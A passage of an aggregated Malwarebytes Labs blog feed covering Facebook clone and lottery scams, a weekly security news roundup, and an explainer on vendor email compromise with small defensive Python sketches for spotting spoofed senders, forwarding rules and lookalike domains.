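    ("bob_xx", "i have FREE tickets, but I cant make it... DM me"),
    ("carol", "Anyone selling two tickets for Saturday?"),
]
dupes = duplicate_posters(posts)
print(dupes)
```

An exact-match fingerprint like this only catches lazy copy-pasting; scammers who rewrite each message would need fuzzier matching.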

Clones, messenger grant scams, and lottery shenanigans

The old problem of “cloned” accounts rears its ugly head once more. Cloning happens when a scammer can’t gain control of a genuine social media account, so they do the next best thing—steal the photo, the bio, and any other pertinent information to replicate the real thing. From there, they try to social engineer their way into the victim’s bank balance.

The smartest part about these Facebook scams is the cloning and mapping out of potential contacts to trick. After that, tactics fall back to the more mundane. Scammers will message contacts with “I’ve been in an accident and need help” or “I’m overseas and have lost my wallet” pleas for help. In this case, “A grant is available” is a commonplace and quite old technique. The current keywords to set off alarm bells include gift cards, world bank, and grants. If you see any of those suddenly dropped into a conversation, it’s almost certainly going to be a scam.

If in doubt, check that the person talking to you is actually in your friends list—clones won’t be. Additionally, if it is genuinely your friend that doesn’t mean the danger is over. What it actually means is that they were probably compromised and don’t know about it. In both cases, find an alternate means to get in touch and verify the who, what, when, where, and why.

Lottery messenger scams work along similar lines. They claim you’ve won a prize, but once you’ve contacted a third party to claim your winnings, you’ll find you need to send them money for a variety of not quite plausible reasons. Often, the profiles telling you that you’ve won will imitate Mark Zuckerberg.

Don’t get fooled on Facebook

Looping back around to our initial fake Facebook ad problem, you can read a little more about how they operate under the hood over on BuzzFeed. We’ve covered many Facebook fakeouts down the years, our most recent being the wave of bogus Ellen profiles pushing movie streaming services.

The good news is that most, if not all, of these Facebook scams have been done before. If you’re not sure, a quick search will reveal prior examples covered on news sites, security blogs, or forum posts.

Always be cautious, remember the old “if it’s too good to be true, it probably is” routine, and keep yourself scam free on social media.

The post Facebook scams: Bad ads, bogus grants, and fake tickets lurk on social media giant appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (November 4 – November 10)

Malwarebytes - Mon, 11/11/2019 - 16:38

Last week on Malwarebytes Labs, we announced the launch of Malwarebytes 4.0, tackled data privacy legislation, and explored some of the ways robocalls come gunning for your data and your money. We also laid out the steps involved in popular vendor email compromise attacks.

Other cybersecurity news
  • Bug bounty bonanza: Rockstar Games open up their bounty program to include the newly-released Red Dead Redemption 2 on PC. (Source: The Daily Swig)
  • The fake news problem: A study shows it’s bad news for people thinking they can avoid bogus information on social networking portals. (Source: Help Net Security)
  • On trial for hacking…yourself? A very confusing story involving a judge, their office computer, and a lesson learned in workplace computer forensics. (Source: The Register)
  • Who’s there? A security flaw: an Internet-connected doorbell causes headaches for owners. (Source: CyberScoop)
  • More fake ads on Facebook: An old scam returns to imitate the BBC and fool eager clickers. (Source: Naked Security)
  • Social media spy games: an Ex-Twitter employee stands accused of spying for Saudi Arabia. (Source: Reuters)
  • Cities power down: Johannesburg up and running after a cyberattack. (Source: BusinessTech)
  • Sextortion attacks still causing trouble: A new report claims these insidious scams are still bringing grief to the masses. (Source: Tricity news)
  • Space-based infosec: If you were wondering how space factors into the US national cyber strategy, then this article will probably be helpful. (Source: Fifth Domain)

Stay safe, everyone!

The post A week in security (November 4 – November 10) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Not us, YOU: vendor email compromise explained

Malwarebytes - Thu, 11/07/2019 - 21:49

Silent Starling, an online organized criminal group hailing from West Africa, seems to have reminded SMBs and enterprises alike of the perils of business email compromise (BEC) scams once more. This time, they’ve advanced BEC into a more potent modality by widening the scope of its potential targets and methodically preparing for the attack from timing to execution. Thus, vendor email compromise (VEC) is born.

If you may recall, BEC is a form of targeted social engineering attack against institutions by baiting certain staff members—usually a CFO or those in the finance, payroll, and human resource departments—who either have access to company monetary accounts or the power to make financial decisions.

A BEC campaign always starts off with an email, either phishing or spoofed. Some BEC scams want money from the get-go, while others are more interested in sensitive information, such as W-2 forms.
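Spoofed senders often leave a trace in the headers. One classic tell (among many, and by no means a complete detector) is a Reply-To domain that differs from the visible From domain. Here is a minimal sketch using Python’s stdlib email parser; the message, names, and lookalike domain are all fabricated for illustration.

```python
from email import message_from_string
from email.utils import parseaddr

def replyto_mismatch(raw: str) -> bool:
    """True when Reply-To points at a different domain than From."""
    msg = message_from_string(raw)
    from_dom = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    reply_dom = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2].lower()
    return bool(reply_dom) and reply_dom != from_dom

# Fabricated message: note the lookalike "exarnple" domain in Reply-To.
raw = ("From: CFO <cfo@example-corp.com>\n"
       "Reply-To: cfo@exarnple-corp.net\n"
       "Subject: Urgent wire transfer\n"
       "\n"
       "Please process today.")
print(replyto_mismatch(raw))  # True
```

Plenty of legitimate mail sets a different Reply-To, so a check like this flags candidates for review rather than proving fraud.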

BEC is remarkably effective at ensnaring victims. Although it may seem like mere trickery, an impressive level of sophistication is actually put into these campaigns to succeed. In fact, a typical BEC campaign so closely follows the kill chain framework used by advanced persistent threats (APTs) that it is deemed APT-like. As such, BEC deserves attention worthy of an APT attack.

So if BEC is already sophisticated enough to warrant APT-level protection, where does that leave businesses hit by vendor email compromise?

BEC changes targets and gets a new name?

Before we launch into logistics of how to protect against VEC, let’s rewind and unpack naming conventions.

It’s true that scam campaigns change targets all the time and on occasion, in a heartbeat. But this particular scam evolution is quite unconventional because the amount of resources required to pull off a highly-successful VEC attack are easily quadruple that of a traditional BEC scam. To look at it another way, threat actors have introduced more friction into their operation instead of removing or minimizing it. However, they’ve also opened up the capacity to inflict far more damage to the target organization and to businesses worldwide.

While a typical BEC campaign baits one staff member at a time to extract money from a targeted organization, a VEC scam doesn’t go after a company for its money. Instead, VEC scammers look to leverage organizations against their own suppliers.

It’s typical for global brands to have hundreds of thousands of suppliers around the world. Procter & Gamble, for example, has at least 50,000 company partners. This translates to at least 50,000 potential victims if VEC scammers can gain a foothold in Procter & Gamble’s systems. And these aren’t 50,000 individuals; they’re 50,000 organizations open to compromise.

This seems like a surefire money-making scheme, but it costs VEC scam operatives much more time and effort to sift through and study communication patterns based on thousands of current and archived email correspondences between the target business and their supply chain.

Okay, now I’m listening. How does VEC work?

According to the Agari Cyber Intelligence Division (ACID), the cybersecurity outfit that has been tracking Silent Starling for some time and recently published a dossier on the group, the VEC attack chain this scam group follows is made up of three key phases.

  • Intrusion. This is where scammers attempt to compromise business email accounts of vendors in a variety of ways, such as phishing. Once successful, scammers move to phase two.
  • Reconnaissance. This is where scammers sit tight and go into “active waiting” mode. While doing so, they gather intel by sifting through archived emails, which may number in the thousands, and create email forwarding and/or redirect rules on the compromised accounts so that copies are sent to email accounts the scammers control. They take note of invoice dates and timing, billing practices, the look of recognized official documents, and any other information they can use to make the attack succeed.
  • Actions on objectives. This is where they launch the VEC attack. The scammer/impersonator makes sure that they are contacting the right person in the targeted supplier company; that the email content they create has high fidelity, meaning it closely resembles typical vendor wording and communication style; and that the timing is as consistent as possible with previous correspondence. These checks make VEC exceedingly difficult to detect.

We’d like to add that reconnaissance also happens before the intrusion phase, in which VEC scammers gather intel on companies they want to target, particularly those whose accounts they can attempt to compromise.
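
One recon artifact defenders can hunt for is the forwarding/redirect rules scammers quietly add to compromised mailboxes. The sketch below is purely illustrative: it assumes mailbox rules have already been exported into simple dictionaries (the field names are hypothetical, not tied to any mail platform's API) and flags any rule that sends mail outside the organization's own domain.

```python
# Hypothetical sketch: audit exported mailbox rules for external auto-forwarding,
# a telltale artifact of the VEC reconnaissance phase described above.
# Rule dicts and field names are illustrative, not a real mail-platform API.

ORG_DOMAIN = "example-vendor.com"  # assumed internal domain

def external_forwarding_rules(rules, org_domain=ORG_DOMAIN):
    """Return rules that forward or redirect mail outside the organization."""
    suspicious = []
    for rule in rules:
        # Only forwarding/redirect actions can leak mail externally.
        if rule.get("action") not in ("forward", "redirect"):
            continue
        target = rule.get("target", "")
        domain = target.rsplit("@", 1)[-1].lower()
        if domain and domain != org_domain:
            suspicious.append(rule)
    return suspicious
```

In practice, such a sweep would run periodically across all mailboxes, since scammers create these rules early and leave them in place for the whole "active waiting" period.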

How can business owners protect against VEC and BEC?

Business owners should address these types of online threats before they happen, while they are happening, and after they happen.

Before an attack
Remember that scams—these included—target people. In particular, they take advantage of what your people don’t know. That said, awareness of the existence of VEC, BEC, and other account takeover campaigns should be the first order of business.

Organizations must ensure that all staff members, from new hires and contractors to the CEO, have at least background knowledge of what these scams are, how they work, what the scam emails look like, which key persons in the company threat actors would target, and what those key persons can do if or when they receive a suspicious email.

Furthermore, it pays to familiarize employees with proper business procedures on how funds and/or sensitive information should be requested.

Policies and procedures for business conducted over email should be in place, if they aren’t already. Organizations can build these around the assumption that the requesting party is not who they claim to be until verified. Think of it as an internal two-step verification process. This can be as simple as calling the boss or supplier at the contact number on record, or requiring a second person to authorize the request.

Also consider instituting a “no last-minute urgent fund requests” rule for higher-ups. If such a request is unavoidable for some reason, a rigorous verification process must be in place and upheld. The higher-up making the request must know the process and expect to undergo it.
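
The policies above can be sketched as a simple approval gate. This is a toy model, not a real payments workflow: the request and vendor-record fields are hypothetical, and the point is only that a request is rejected whenever account details change, an urgent request lacks out-of-band confirmation, or no second approver is named.

```python
# Illustrative sketch of the internal two-step verification policy described
# above. All field names are hypothetical.

def clear_payment_request(request, vendor_record):
    """Return (approved, reason) for a payment request against the vendor file."""
    if request["account"] != vendor_record["account"]:
        # A sudden change in account details is the classic VEC red flag.
        return False, "account details differ from vendor record; verify by phone"
    if request.get("urgent") and not request.get("out_of_band_confirmed"):
        return False, "urgent request requires out-of-band confirmation"
    if not request.get("second_approver"):
        return False, "a second person must authorize the request"
    return True, "ok"
```

Note that the checks are deliberately conservative: the gate fails closed, so a request that trips any rule waits for a human phone call rather than going through.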

During an attack
It’s possible for highly sophisticated scams to tick all the verification boxes, until they don’t. Remember that in these particular scams, there will always be something different that stands out. It could be the sender’s name, signature, or the email address itself, but usually it’s a sudden change in account details that raises the alarm. Heed this alarm and call the supplier or vendor making the financial request (a video call is ideal, if possible) to confirm that they actually submitted it.
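
One of those "something different" tells is a sender address that is one typo away from a real vendor domain (for instance, "supp1ier.com" imitating "supplier.com"). The sketch below is a minimal, assumption-laden illustration of that check: it computes Levenshtein edit distance by hand and flags senders whose domain is within one edit of a known vendor domain; the domain names are made up.

```python
# Minimal sketch: flag sender domains that are one edit away from a known
# vendor domain, a common lookalike-domain trick in BEC/VEC. Example
# domains are hypothetical.

def edit_distance(a, b):
    """Classic Levenshtein distance via dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def lookalike_domain(sender, known_domains, max_distance=1):
    """Return the known domain the sender's domain imitates, if any."""
    domain = sender.rsplit("@", 1)[-1].lower()
    for known in known_domains:
        if domain != known and edit_distance(domain, known) <= max_distance:
            return known
    return None
```

A real mail filter would combine this with display-name matching and allow-lists, but even this crude distance check catches the single-character swaps scammers favor.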

After an attack
In the event that fraud is discovered after the financial request is fulfilled, begin the recovery process right away. Call your bank and request that they talk to the bank where the transfer was sent. If your business is insured, call your insurers and company shareholders. Lastly, reach out to local law enforcement and the FBI.

While things may be chaotic at this point, organizations must remember to document everything that has happened while gathering evidence. This information is not only essential during investigations but can also serve as training material for employees. It may not seem like it, but successful cyberattacks and scams are invaluable experiences organizations can learn from.

Furthermore, assess if sensitive information has been stolen as well. If so, mitigate according to the type of information stolen so that it can never be used to harm the company, its assets, and its people.

Lastly, if your company is not using one (or some) already, consider investing in security tools with advanced configuration options that can detect and nip BEC and VEC scams in the bud. Such tools build on email authentication standards like Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting and Conformance (DMARC).
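
To make DMARC a little more concrete: a domain publishes its policy as a DNS TXT record at `_dmarc.<domain>`, and the `p=` tag tells receivers what to do with mail that fails authentication. The sketch below only parses such a record string into tags; the example record is made up, and fetching the real record would require a DNS lookup, which is not shown.

```python
# Hedged sketch: parse a DMARC TXT record (e.g. "v=DMARC1; p=reject; ...")
# into tags so a script can check whether a domain actually enforces a
# reject or quarantine policy. The record string is an example only.

def parse_dmarc(record):
    """Split a DMARC TXT record into a tag dictionary."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" in part:
            key, _, value = part.partition("=")
            tags[key.strip().lower()] = value.strip()
    return tags

def enforces_dmarc(record):
    """True if the policy rejects or quarantines mail that fails DMARC."""
    return parse_dmarc(record).get("p") in ("reject", "quarantine")
```

A domain publishing `p=none` is merely monitoring; only `p=quarantine` or `p=reject` actually blocks spoofed mail, which is why auditing your own (and your vendors') DMARC policies is worth the effort.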

Stay safe!

The post Not us, YOU: vendor email compromise explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds

